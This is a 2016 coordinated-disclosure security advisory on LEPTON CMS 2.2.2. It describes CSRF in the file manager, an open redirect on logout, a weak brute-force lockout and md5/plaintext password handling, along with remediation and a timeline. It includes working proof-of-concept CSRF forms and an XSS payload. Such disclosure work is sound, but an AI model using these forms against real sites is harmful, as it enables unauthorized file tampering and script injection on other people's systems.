Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version http://www.lepton-cms.org/posts/ Link: important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection & Type: Password Handling Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-build bruteforce protection can be easily bypassed, and passwords are hashed with md5 and send out via email in plaintext. 3. Details CSRF CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack. Proof of Concept: Delete Folder: <html> <body> <form action="http://localhost// LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php? action=delete_folder" method="POST"> <input type="hidden" name="path" value= "test>" /> <input type="hidden" name="name" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Create File: <html> <body> <form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/ tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type ="hidden" name="path" value="" /> <input type="hidden" name="name" value= "test.html" /> <input type="hidden" name="new_content" value="<img src=no onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </ body> </html> Open Redirect CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP Description: The redirect parameter of the logout script is vulnerable to open redirect. Proof of Concept: http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http:// google.com Insufficient Bruteforce Protection Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed. Code: if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); } Password Handling The password reset functionality sends a newly generated password in plaintext via email, which is not recommended. Additionally, md5 is used for hashing, which is also not recommended. 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-StraAe 54 10365 Berlin, Germany